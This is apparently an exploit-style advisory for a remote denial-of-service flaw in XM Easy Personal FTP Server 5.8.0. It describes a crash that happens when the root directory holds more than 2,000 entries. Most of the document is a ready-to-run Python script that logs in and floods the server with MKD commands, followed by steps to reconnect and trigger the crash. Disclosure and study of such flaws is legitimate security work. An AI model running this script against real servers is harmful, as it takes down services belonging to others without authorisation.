XM Easy Personal FTP Server 5.8.0 - Remote DoS Vulnerability

                                                Date of Discovery: 24-Nov-2009

Credits:leinakesi[at]gmail.com

Vendor: Dxmsoft
*******************************************************************************
Affected:

        XM Easy Personal FTP Server 5.8.0
        Earlier versions may also be affected
*******************************************************************************
Overview:

        XM Easy Personal FTP Server failed to handle more than 2000 files or folders in 

the root directory.
*******************************************************************************
Details:

        if you could log on the server, take the following steps and the server will 

crash which lead to DoS.
        
        1.upload 2000 files or folders.
        2.close the current connection.
        3.use a ftp client to reconnect the server.
                user ...
                pass ...
                port ...
                list ...
                crash!!!!!!
*******************************************************************************
Exploit example:

1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string='a'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    sock.send("user %s\r\n" %username)
    r=sock.recv(1024)
    sock.send("pass %s\r\n" %passwd)

    for i in range(1,200):
         sock.send("mkd " + "a" * i +"\r\n")
         print "[-] " + ("mkd " + "a" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "b" * i +"\r\n")
         print "[-] " + ("mkd " + "b" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "c" * i +"\r\n")
         print "[-] " + ("mkd " + "c" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "d" * i +"\r\n")
         print "[-] " + ("mkd " + "d" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "e" * i +"\r\n")
         print "[-] " + ("mkd " + "e" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "f" * i +"\r\n")
         print "[-] " + ("mkd " + "f" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "g" * i +"\r\n")
         print "[-] " + ("mkd " + "g" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "h" * i +"\r\n")
         print "[-] " + ("mkd " + "h" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "i" * i +"\r\n")
         print "[-] " + ("mkd " + "i" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"
    for i in range(1,200):
         sock.send("mkd " + "j" * i +"\r\n")
         print "[-] " + ("mkd " + "j" * i +"\r\n")
         r=sock.recv(1024)
         print "[+] " + r + "\r\n"

    sock.close()
    sys.exit(0);

2.use a ftp client to reconnect the server
for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir